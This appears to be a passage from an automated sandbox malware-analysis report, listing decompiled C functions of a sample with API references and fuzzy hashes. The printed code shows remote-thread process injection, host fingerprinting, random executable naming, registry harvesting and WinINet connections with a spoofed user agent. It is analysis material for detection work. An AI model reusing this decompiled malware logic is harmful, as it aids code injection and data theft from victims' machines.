    • WindowFromPoint.USER32(?,?), ref: 0040B5D6
    • SendMessageTimeoutW.USER32 ref: 0040B607
    • GetWindowLongW.USER32(00000000,000000F0), ref: 0040B62B
    • SetWindowLongW.USER32 ref: 0040B63C
    • GetWindowLongW.USER32(?,000000F0), ref: 0040B659
    • SetWindowLongW.USER32 ref: 0040B667
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Window$Long$FromMessagePointSendTimeout
    • String ID:
    • API String ID: 2645164282-0
    • Opcode ID: 445d99de79672755f5aa46e7022dbbcf955507ab8ac19f69d707e79fc107a6cf
    • Instruction ID: fd3a74ec86d6244d727f308fc5769cb1ade06b0b8291bd410265d41c021234f9
    • Opcode Fuzzy Hash: 445d99de79672755f5aa46e7022dbbcf955507ab8ac19f69d707e79fc107a6cf
    • Instruction Fuzzy Hash: 5121F371108315ABD7009F64CC40E6B7B98EB84774F200B3AFDA0A23E1D775D8149BD9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 74%
    			E0040C09A(signed int __eax, void* __ecx, void** __esi, long _a4) {
    				intOrPtr _v8;
    				long _v12;
    				void* _t19;
    				void* _t20;
    				long _t22;
    				void* _t23;
    
    				_t33 = __esi;
    				asm("sbb eax, eax");
    				_t19 = CreateFileW(_a4, 0x80000000,  ~(__eax & 2) & 0x00000006 | 0x00000001, 0, 3, 0, 0);
    				__esi[2] = _t19;
    				if(_t19 == 0xffffffff) {
    					L11:
    					_t20 = 0;
    				} else {
    					__imp__GetFileSizeEx(_t19,  &_v12);
    					if(_t19 == 0 || _v8 != 0) {
    						L10:
    						CloseHandle(_t33[2]);
    						goto L11;
    					} else {
    						_t22 = _v12;
    						__esi[1] = _t22;
    						if(_t22 != 0) {
    							_t23 = VirtualAlloc(0, _t22, 0x3000, 4);
    							 *__esi = _t23;
    							if(_t23 == 0) {
    								goto L10;
    							} else {
    								if(ReadFile(__esi[2], _t23, __esi[1],  &_a4, 0) == 0 || _a4 != __esi[1]) {
    									VirtualFree( *_t33, 0, 0x8000);
    									goto L10;
    								} else {
    									goto L5;
    								}
    							}
    						} else {
    							 *__esi = 0;
    							L5:
    							_t20 = 1;
    						}
    					}
    				}
    				return _t20;
    			}

    APIs
    • CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,?,?,?,?,004136D2,?,?,00000000), ref: 0040C0BF
    • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,004136D2,?,?,00000000), ref: 0040C0D2
    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,004136D2,?,?,00000000), ref: 0040C0FA
    • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,004136D2,?,?,00000000), ref: 0040C112
    • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,004136D2,?,?,00000000), ref: 0040C12C
    • CloseHandle.KERNEL32(?,?,?,?,?,004136D2,?,?,00000000), ref: 0040C135
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
    • String ID:
    • API String ID: 1974014688-0
    • Opcode ID: 05cfcad8ec1c1237e72fae49f687263ac3a735d7e25788011c1d4679afa2a1af
    • Instruction ID: 151662195e7641df871818221c66febb6267d545c45ce423d8321bec0c32c005
    • Opcode Fuzzy Hash: 05cfcad8ec1c1237e72fae49f687263ac3a735d7e25788011c1d4679afa2a1af
    • Instruction Fuzzy Hash: 54119075100200FFDB219F21CD89EAB7BE8EB55700F10462DF596E61A1D330A981CB28
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E0040568F(struct HWND__* _a4, struct HRGN__* _a8, int _a12) {
    				void* _t21;
    				int _t22;
    				signed int _t23;
    				struct HWND__* _t27;
    				char* _t31;
    
    				_t27 = _a4;
    				if(( *0x423968 & 0x00000004) == 0 || E00412FEE() == 0) {
    					L7:
    					return GetUpdateRgn(_t27, _a8, _a12);
    				} else {
    					_t31 = TlsGetValue( *0x4231bc);
    					if(_t31 == 0 || _t27 !=  *((intOrPtr*)(_t31 + 4))) {
    						goto L7;
    					} else {
    						SetRectRgn(_a8,  *(_t31 + 0xc),  *(_t31 + 0x10),  *(_t31 + 0x14),  *(_t31 + 0x18));
    						if(_a12 != 0) {
    							_t22 = SaveDC( *(_t31 + 8));
    							_t23 = SendMessageW(_t27, 0x14,  *(_t31 + 8), 0);
    							asm("sbb eax, eax");
    							 *((intOrPtr*)(_t31 + 0x1c)) =  ~_t23 + 1;
    							RestoreDC( *(_t31 + 8), _t22);
    						}
    						 *_t31 = 1;
    						_t21 = 2;
    						return _t21;
    					}
    				}
    			}

    APIs
    • GetUpdateRgn.USER32 ref: 00405717
      • Part of subcall function 00412FEE: WaitForSingleObject.KERNEL32(00000000,004141F7,743C152E,00000002), ref: 00412FF6
    • TlsGetValue.KERNEL32 ref: 004056AF
    • SetRectRgn.GDI32(?,?,?,?,?), ref: 004056CF
    • SaveDC.GDI32(?), ref: 004056DF
    • SendMessageW.USER32(?,00000014,?,00000000), ref: 004056EF
    • RestoreDC.GDI32(?,00000000), ref: 00405701
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: MessageObjectRectRestoreSaveSendSingleUpdateValueWait
    • String ID:
    • API String ID: 3142230470-0
    • Opcode ID: 1219a6502d0d05a5151383bc0b64907565123d2d55f7d65cebd23832a32be42d
    • Instruction ID: 53c7e8738a14773c49e775ba264bbb356a528ed9f3544e25e8c355f4ad31de9e
    • Opcode Fuzzy Hash: 1219a6502d0d05a5151383bc0b64907565123d2d55f7d65cebd23832a32be42d
    • Instruction Fuzzy Hash: AB115E31000741EBDB325F65ED48F977BB5FB44711F044829FA86A25B1C376A4A1EF68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 86%
    			E00405F04(void* __ecx, long _a4, intOrPtr _a8) {
    				char _v5;
    				void* __edi;
    				void* __esi;
    				void* _t10;
    				void* _t14;
    				void* _t23;
    				void* _t25;
    				void* _t26;
    
    				_t21 = __ecx;
    				_push(__ecx);
    				_v5 = 0;
    				_t23 = OpenProcess(0x47a, 0, _a4);
    				_t28 = _t23;
    				if(_t23 != 0) {
    					_push(_t25);
    					_t10 = E00412F03(_t21, _t23, _t25, _t28, _a8, 0);
    					_t26 = _t10;
    					if(_t26 != 0) {
    						_t14 = CreateRemoteThread(_t23, 0, 0, _t10 -  *0x42397c + E004136A2, 0, 0, 0);
    						_a4 = _t14;
    						if(_t14 == 0) {
    							VirtualFreeEx(_t23, _t26, 0, 0x8000);
    						} else {
    							WaitForSingleObject(_t14, 0x2710);
    							CloseHandle(_a4);
    							_v5 = 1;
    						}
    					}
    					CloseHandle(_t23);
    				}
    				return _v5;
    			}

    APIs
    • OpenProcess.KERNEL32(0000047A,00000000,74B5F560,00000000,74B5F560,?,?,004060BC,?,?,00000000,?,74B5F560,00000000), ref: 00405F18
    • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-0083701E,00000000,00000000,00000000), ref: 00405F46
    • WaitForSingleObject.KERNEL32(00000000,00002710,?,004060BC,?,?,00000000,?,74B5F560,00000000), ref: 00405F59
    • CloseHandle.KERNEL32(74B5F560,?,004060BC,?,?,00000000,?,74B5F560,00000000), ref: 00405F62
    • VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000,?,004060BC,?,?,00000000,?,74B5F560,00000000), ref: 00405F76
    • CloseHandle.KERNEL32(00000000,?,00000000,?,?,004060BC,?,?,00000000,?,74B5F560,00000000), ref: 00405F7D
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseHandle$CreateFreeObjectOpenProcessRemoteSingleThreadVirtualWait
    • String ID:
    • API String ID: 14861764-0
    • Opcode ID: 0b143925859ab585576211d55fbaf1db165d8ede8ecb4e6919481f870966e8e2
    • Instruction ID: d0e000c651090204909094b0d560fe96ffc13946eb319b963085ff98b325462e
    • Opcode Fuzzy Hash: 0b143925859ab585576211d55fbaf1db165d8ede8ecb4e6919481f870966e8e2
    • Instruction Fuzzy Hash: DE019EB2104149BFEB102B649D88EBF3E6CDB49394B0440B9FA01F6160C7794C458A79
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 41%
    			E0040E2A5(char* __ecx, void* __edx, signed int _a4, signed int _a8) {
    				char _v5;
    				signed int _v12;
    				char _v20;
    				char _v64;
    				char _v552;
    				char _v556;
    				short _v588;
    				void* __ebx;
    				void* __esi;
    				signed int _t62;
    				signed int _t64;
    				signed int _t65;
    				signed short _t71;
    				signed short _t75;
    				void* _t92;
    				void* _t95;
    				void* _t97;
    				signed short _t99;
    				void* _t100;
    				void* _t101;
    				void* _t102;
    				void* _t103;
    				void* _t104;
    				void* _t105;
    				void* _t109;
    				signed int _t111;
    				char* _t112;
    				void* _t113;
    
    				_t109 = __edx;
    				_t106 = __ecx;
    				_t111 = _a4;
    				_t114 =  *_t111;
    				_t99 = 1;
    				_v5 = 0;
    				if( *_t111 == 0) {
    					_t97 = E0040C766(_t114);
    					 *_t111 = _t97;
    					if(_t97 == 0) {
    						return 0;
    					}
    					_v5 = 1;
    				}
    				__eflags = _a8 & 0x00000001;
    				if((_a8 & 0x00000001) == 0) {
    					L9:
    					__eflags = _a8 & 0x00000002;
    					if((_a8 & 0x00000002) != 0) {
    						_push( &_v12);
    						_push(0x20000);
    						_push(0x2713);
    						_t105 = 4;
    						_v12 = 0x7070707;
    						_t99 = E0040C77A(_t111, _t105);
    					}
    					L11:
    					__eflags = _a8 & 0x00000004;
    					if((_a8 & 0x00000004) == 0) {
    						L16:
    						__eflags = _t99;
    						if(_t99 == 0) {
    							L32:
    							__eflags = _v5 - 1;
    							if(_v5 == 1) {
    								E00406E85( *_t111);
    								 *_t111 =  *_t111 & 0x00000000;
    								__eflags =  *_t111;
    							}
    							L34:
    							return _t99;
    						}
    						__eflags = _a8 & 0x00000008;
    						if((_a8 & 0x00000008) == 0) {
    							L20:
    							__eflags = _t99;
    							if(_t99 == 0) {
    								goto L32;
    							}
    							__eflags = _a8 & 0x00000010;
    							if((_a8 & 0x00000010) == 0) {
    								L28:
    								__eflags = _t99;
    								if(_t99 == 0) {
    									goto L32;
    								}
    								__eflags = _a8 & 0x00000020;
    								if((_a8 & 0x00000020) != 0) {
    									E0040E1F1(_t106, _t111, 2);
    									E0040E1F1(_t106, _t111, 0x17);
    								}
    								goto L34;
    							}
    							_t62 = GetModuleFileNameW(0,  &_v588, 0x103);
    							_a4 = _t62;
    							__eflags = _t62;
    							if(_t62 != 0) {
    								__eflags = 0;
    								 *((short*)(_t113 + _t62 * 2 - 0x248)) = 0;
    								_t106 =  &_v588;
    								_t99 = E0040C827(_t62,  &_v588, _t109, 0, _t111, 0x271e);
    							}
    							_a4 = 0x104;
    							__eflags = _t99;
    							if(_t99 == 0) {
    								goto L32;
    							} else {
    								_t64 =  &_v588;
    								__imp__GetUserNameExW(2, _t64,  &_a4);
    								__eflags = _t64;
    								if(_t64 != 0) {
    									_t65 = _a4;
    									__eflags = _t65;
    									if(_t65 != 0) {
    										__eflags = 0;
    										 *((short*)(_t113 + _t65 * 2 - 0x248)) = 0;
    										_t106 =  &_v588;
    										_t99 = E0040C827(_t65,  &_v588, _t109, 0, _t111, 0x271f);
    									}
    								}
    								goto L28;
    							}
    						}
    						_t112 =  &_v20;
    						E00413BC3(_t112);
    						_push(_t112);
    						_push(0x20000);
    						_push(0x271c);
    						_t100 = 6;
    						_t71 = E0040C77A(_a4, _t100);
    						_t99 = _t71;
    						__eflags = _t99;
    						if(_t99 == 0) {
    							_t111 = _a4;
    							goto L32;
    						}
    						__imp__GetUserDefaultUILanguage();
    						_v12 = _t71 & 0x0000ffff;
    						_push( &_v12);
    						_push(0x20000);
    						_push(0x271d);
    						_t101 = 2;
    						_t75 = E0040C77A(_a4, _t101);
    						_t111 = _a4;
    						_t99 = _t75;
    						goto L20;
    					}
    					__eflags = _t99;
    					if(_t99 == 0) {
    						goto L32;
    					}
    					_v12 = E00406F87();
    					_push( &_v12);
    					_push(0x20000);
    					_push(0x2719);
    					_t102 = 4;
    					_t99 = E0040C77A(_t111, _t102);
    					__eflags = _t99;
    					if(_t99 == 0) {
    						goto L32;
    					}
    					_v12 = E00406FAF();
    					_push( &_v12);
    					_push(0x20000);
    					_push(0x271b);
    					_t103 = 4;
    					_t99 = E0040C77A(_t111, _t103);
    					__eflags = _t99;
    					if(_t99 == 0) {
    						goto L32;
    					}
    					_v12 = GetTickCount();
    					_push( &_v12);
    					_push(0x20000);
    					_push(0x271a);
    					_t104 = 4;
    					_t99 = E0040C77A(_t111, _t104);
    					goto L16;
    				}
    				_t92 = E00413194(_t106,  &_v556);
    				_t106 =  &_v552;
    				_t99 = E0040C827(_t92,  &_v552, _t109, __eflags, _t111, 0x2711);
    				__eflags = _t99;
    				if(_t99 == 0) {
    					goto L11;
    				}
    				_t95 = E004132F4( &_v552,  &_v64);
    				__eflags = _v64;
    				if(__eflags != 0) {
    					_t106 =  &_v64;
    					_t99 = E0040C827(_t95,  &_v64, _t109, __eflags, _t111, 0x2712);
    				}
    				__eflags = _t99;
    				if(_t99 == 0) {
    					goto L11;
    				}
    				goto L9;
    			}

    APIs
    • GetTickCount.KERNEL32 ref: 0040E3A4
    • GetUserDefaultUILanguage.KERNEL32(0000271C,00020000,?,00000000,?,00000000), ref: 0040E3F7
    • GetModuleFileNameW.KERNEL32(00000000,?,00000103,00000000,?,00000000), ref: 0040E439
    • GetUserNameExW.SECUR32(00000002,?,00000104), ref: 0040E47B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: NameUser$CountDefaultFileLanguageModuleTick
    • String ID:
    • API String ID: 2256650695-3916222277
    • Opcode ID: 8b80994f005356376355924ee7c7275a1c01e26cad5073e53c9f5c9bbcbf5aa7
    • Instruction ID: 907b05b41f2661ed186bc4ee48ae5d99746dc38833a45aa7af620ac9e0b244b0
    • Opcode Fuzzy Hash: 8b80994f005356376355924ee7c7275a1c01e26cad5073e53c9f5c9bbcbf5aa7
    • Instruction Fuzzy Hash: DE51FA7168024879E710AB66D849FDE3BA89F02314F08457BFD48BF2D2D77C9A54CB58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040B204(signed int __eax, signed int __ecx, void* __eflags, signed int _a4, signed short* _a8) {
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				signed int _v20;
    				intOrPtr _v24;
    				char* _v28;
    				char* _v32;
    				signed int _t56;
    				WCHAR* _t57;
    				short* _t59;
    				signed short _t71;
    				char* _t77;
    				signed int _t84;
    				signed short* _t85;
    				signed int _t87;
    				intOrPtr _t88;
    				void* _t89;
    
    				_t87 = E0040820A(__eax & 0x000000ff, __ecx & 0x000000ff);
    				_v16 = _t87;
    				_t56 = E004081BE();
    				_t77 = "bcdfghklmnpqrstvwxz";
    				if((_t56 & 0x00000100) == 0) {
    					_v32 = "aeiouy";
    					_v28 = _t77;
    				} else {
    					_v32 = _t77;
    					_v28 = "aeiouy";
    				}
    				_t84 = 0;
    				_v12 = 0;
    				_v8 = 0;
    				if(_t87 > 0) {
    					_v20 = _a4 & 0x00000004;
    					do {
    						if(_v8 == 2) {
    							if((E004081BE() & 0x00000100) == 0) {
    								_v32 = "aeiouy";
    								_v28 = _t77;
    							} else {
    								_v32 = _t77;
    								_v28 = "aeiouy";
    							}
    							_v8 = _v8 & 0x00000000;
    						}
    						_t88 =  *((intOrPtr*)(_t89 + _v8 * 4 - 0x1c));
    						_v24 = ((0 | _t88 != _t77) - 0x00000001 & 0x0000000d) + 6;
    						if(_v20 == 0 || _t84 - _v12 <= 1 || (E004081BE() & 0x00000101) != 0x101) {
    							_t71 =  *((char*)(E0040820A(_v24 - 1, 0) + _t88));
    						} else {
    							_t71 = 0x20;
    							_v12 = _t84;
    						}
    						_a8[_t84] = _t71;
    						_t84 = _t84 + 1;
    						_v8 = _v8 + 1;
    					} while (_t84 < _v16);
    					_t87 = _v16;
    				}
    				if((_a4 & 0x00000004) == 0 || _t87 == 0) {
    					_t85 = _a8;
    				} else {
    					_t85 = _a8;
    					_t59 = _t85 + _t87 * 2 - 2;
    					while( *_t59 == 0x20) {
    						_t59 = _t59 - 2;
    						_t87 = _t87 - 1;
    						if(_t87 != 0) {
    							continue;
    						} else {
    						}
    						goto L24;
    					}
    				}
    				L24:
    				_t57 = 0;
    				_t85[_t87] = 0;
    				if((_a4 & 0x00000002) != 0) {
    					_t57 = CharUpperW( *_t85 & 0x0000ffff);
    					 *_t85 = 0;
    				}
    				return _t57;
    			}

    APIs
      • Part of subcall function 004081BE: GetTickCount.KERNEL32 ref: 004081BE
    • CharUpperW.USER32(00000000,?,.exe,00000000,00000000), ref: 0040B325
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CharCountTickUpper
    • String ID: .exe$TE@$aeiouy$bcdfghklmnpqrstvwxz
    • API String ID: 2674899715-2794143064
    • Opcode ID: 3bd7bb51b169408c925792aa529354ae0cdc0e9252f4b2617dd42aac321b09ce
    • Instruction ID: 07dc0da1f6772eca4de8e2b26585d6cc587e1659e31f625147f11a18a0492f52
    • Opcode Fuzzy Hash: 3bd7bb51b169408c925792aa529354ae0cdc0e9252f4b2617dd42aac321b09ce
    • Instruction Fuzzy Hash: 9F317E71D00219ABCB10AF99C5492BEBBB4FF84304F2480BBD951BB381D7789A458BDD
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00408A59(signed int __eax, char* __ecx) {
    				short _v28;
    				char* _v32;
    				signed int _t5;
    				void* _t12;
    				void* _t14;
    				char* _t15;
    				void* _t18;
    
    				_t15 = __ecx;
    				_t5 = __eax;
    				if(__ecx == 0) {
    					_t15 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)";
    				}
    				_t14 = InternetOpenA(_t15,  !_t5 & 0x00000001, 0, 0, 0);
    				if(_t14 == 0) {
    					L7:
    					return 0;
    				}
    				_t18 = 0;
    				do {
    					_t1 = _t18 + 0x42200c; // 0x42200c
    					_t2 = _t18 + 0x422008; // 0x2
    					InternetSetOptionA(_t14,  *_t2, _t1, 4);
    					_t18 = _t18 + 8;
    				} while (_t18 < 0x18);
    				_t12 = InternetConnectA(_t14, _v32, _v28, 0, 0, 3, 0, 0);
    				if(_t12 == 0) {
    					InternetCloseHandle(_t14);
    					goto L7;
    				}
    				return _t12;
    			}

    APIs
    • InternetOpenA.WININET(?,?,00000000,00000000,00000000), ref: 00408A70
    • InternetSetOptionA.WININET(00000000,00000002,0042200C,00000004), ref: 00408A8F
    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00408AAC
    • InternetCloseHandle.WININET(00000000), ref: 00408AB8
    Strings
    • Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1), xrefs: 00408A61, 00408A6F
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Internet$CloseConnectHandleOpenOption
    • String ID: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)
    • API String ID: 910987326-3737944857
    • Opcode ID: 5aefe19d0bb32e9cbeb8b693221f9016185c1d2ab1fa0afa268bba74750c75a0
    • Instruction ID: ecf7a95223baafc7fa3ef10421a8b69485df1f480f989e86a2e7ed047b97c706
    • Opcode Fuzzy Hash: 5aefe19d0bb32e9cbeb8b693221f9016185c1d2ab1fa0afa268bba74750c75a0
    • Instruction Fuzzy Hash: 93F090723006007EE62157B19ECCDAB7AAEEBC9B51B04043EF696F1171CA358954DB78
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 54%
    			E00408ECD() {
    				char _v8;
    				struct HINSTANCE__* _v12;
    				void* _v1036;
    				struct HINSTANCE__* _t13;
    				_Unknown_base(*)()* _t15;
    				char _t22;
    				void* _t28;
    
    				_t22 = 0;
    				_t13 = LoadLibraryA("urlmon.dll");
    				_v12 = _t13;
    				if(_t13 != 0) {
    					_t15 = GetProcAddress(_t13, "ObtainUserAgentString");
    					if(_t15 != 0) {
    						_push( &_v8);
    						_push( &_v1036);
    						_push(0);
    						_v8 = 0x3ff;
    						_v1036 = 0;
    						if( *_t15() == 0) {
    							if(_v8 > 0x3ff) {
    								_v8 = 0x3ff;
    							}
    							 *((char*)(_t28 + _v8 - 0x408)) = _t22;
    							_t22 = E004072E3( &_v1036 | 0xffffffff,  &_v1036);
    						}
    					}
    					FreeLibrary(_v12);
    				}
    				return _t22;
    			}

    APIs
    • LoadLibraryA.KERNEL32(urlmon.dll,00000000), ref: 00408EDE
    • GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 00408EF1
    • FreeLibrary.KERNEL32(?), ref: 00408F43
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Library$AddressFreeLoadProc
    • String ID: ObtainUserAgentString$urlmon.dll
    • API String ID: 145871493-2685262326
    • Opcode ID: 616815c3e9121ffbf343b8d9e5611115b815e3e077c504ae8231f3eabdef1484
    • Instruction ID: 10d331c377c60e76e4e430cab6511ee98c32b5cf3d84bfe40173934adb45765b
    • Opcode Fuzzy Hash: 616815c3e9121ffbf343b8d9e5611115b815e3e077c504ae8231f3eabdef1484
    • Instruction Fuzzy Hash: 680184B1D04219ABCB50EBF89E8459E7BB8AB04300F2001BEB755F3290DA748E448B68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E00418DA5(char* __ecx, void* __eflags) {
    				int _v8;
    				void* _v12;
    				signed int _v16;
    				char* _v20;
    				intOrPtr _v24;
    				int _v28;
    				intOrPtr _v32;
    				char _v36;
    				void* _v40;
    				intOrPtr _v44;
    				char* _v48;
    				char _v60;
    				char _v80;
    				char _v100;
    				char _v120;
    				char _v152;
    				char _v216;
    				char _v284;
    				short _v804;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t70;
    				int _t102;
    				int _t110;
    				int _t114;
    				void* _t115;
    				signed int _t117;
    				void* _t119;
    				intOrPtr _t121;
    				void* _t124;
    				intOrPtr _t127;
    				int _t134;
    				intOrPtr _t136;
    				char* _t138;
    				char* _t141;
    				signed int _t145;
    				void* _t146;
    				void* _t147;
    
    				_t129 = __ecx;
    				_t70 = E00406E55(0xc08);
    				_t127 = _t70;
    				_t134 = 0;
    				_v24 = _t127;
    				if(_t127 == 0) {
    					return _t70;
    				} else {
    					E00405B00(0x83,  &_v216);
    					_t141 =  &_v284;
    					E00405B00(0x84, _t141);
    					_v48 =  &_v216;
    					_v44 = _t141;
    					E00406F38( &_v36,  &_v36, 0, 8);
    					E00405B00(0x85,  &_v120);
    					E00405B00(0x86,  &_v100);
    					E00405B00(0x87,  &_v60);
    					_t145 =  &_v80;
    					E00405B00(0x88, _t145);
    					_t12 = _t127 + 0x3fc; // 0x3fc
    					_v20 = _t12;
    					_v16 = 0;
    					do {
    						if(RegOpenKeyExW(0x80000001,  *(_t146 + _v16 * 4 - 0x2c), _t134, 8,  &_v12) != 0) {
    							goto L22;
    						}
    						_v28 = _t134;
    						_v8 = 0x104;
    						if(RegEnumKeyExW(_v12, _t134,  &_v804,  &_v8, _t134, _t134, _t134, _t134) != 0) {
    							L21:
    							RegCloseKey(_v12);
    							goto L22;
    						} else {
    							goto L4;
    						}
    						do {
    							L4:
    							_t136 = _v24;
    							_v28 = _v28 + 1;
    							_t102 = E0040AFA9(_v12, _t129, _t136,  &_v804,  &_v120, 0xff);
    							_t145 = _t145 | 0xffffffff;
    							_v8 = _t102;
    							if(_t102 != _t145 && _t102 != 0) {
    								_t137 = _t136 + 0x1fe;
    								_t110 = E0040AFA9(_v12, _t129, _t136 + 0x1fe,  &_v804,  &_v100, 0xff);
    								_v8 = _t110;
    								if(_t110 == _t145 || _t110 == 0) {
    									_t114 = E0040AFA9(_v12, _t129, _t137,  &_v804,  &_v60, 0xff);
    									_v8 = _t114;
    									if(_t114 == _t145 || _t114 == 0) {
    										goto L19;
    									} else {
    										goto L10;
    									}
    								} else {
    									L10:
    									_t115 = _v12;
    									_t129 =  &_v804;
    									_v40 = _t115;
    									if(RegOpenKeyExW(_t115,  &_v804, 0, 1,  &_v40) != 0) {
    										_t117 = _t145;
    									} else {
    										_t145 =  &_v40;
    										_t117 = E0040B0D1(_t145,  &_v80, _t116, _v20, 0xff);
    									}
    									_v8 = _t117;
    									if(_t117 != 0xffffffff && _t117 != 0) {
    										_t138 = _v20;
    										if(E00418D4B(_t138) > 0) {
    											_t145 =  &_v152;
    											_t119 = 0x56;
    											E00405B00(_t119, _t145);
    											_t121 = _v24;
    											_push(_t121);
    											_t129 = _t138;
    											_push(_t129);
    											_push(_t121 + 0x1fe);
    											_t51 = _t129 + 0x1fe; // 0x1fe
    											_t124 = E00407B78(_t145, 0x307, _t51, _t145);
    											_t147 = _t147 + 0x10;
    											if(_t124 > 0) {
    												_t129 =  &_v36;
    												if(E00407279(_t124,  &_v36, _v20 + 0x1fe) != 0) {
    													_v32 = _v32 + 1;
    												}
    											}
    										}
    									}
    									goto L19;
    								}
    							}
    							L19:
    							_v8 = 0x104;
    						} while (RegEnumKeyExW(_v12, _v28,  &_v804,  &_v8, 0, 0, 0, 0) == 0);
    						_t134 = 0;
    						goto L21;
    						L22:
    						_v16 = _v16 + 1;
    					} while (_v16 < 2);
    					E00406E85(_v24);
    					if(_v32 <= _t134) {
    						return E00406E85(_v36);
    					}
    					return E00416CBC(0x307, _v36, 0xcb);
    				}
    			}

    APIs
    • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008,?,00000000,00000001), ref: 00418E5C
    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,00000001), ref: 00418E87
    • RegCloseKey.ADVAPI32(?,?,00000000,00000001), ref: 00418FDD
      • Part of subcall function 0040AFA9: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00413CB1,?,?,00000104,.exe,00000000), ref: 0040AFBE
    • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF,?,00000000,00000001), ref: 00418FCA
      • Part of subcall function 0040AFA9: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00413CB1,?,?,00000104), ref: 0040B03F
    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?,?,?,000000FF,?,?,000000FF,?,?,000000FF,?,00000000), ref: 00418F27
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Open$Enum$CloseEnvironmentExpandStrings
    • String ID:
    • API String ID: 2343474859-0
    • Opcode ID: 6d28c9fed770babdeb51da01369116c3626a732551c3723bd645e67b585133f4
    • Instruction ID: 8c38dc6d86e57e2ea038a5814cb647bf467c864863428e510fbcf049abf8ac87
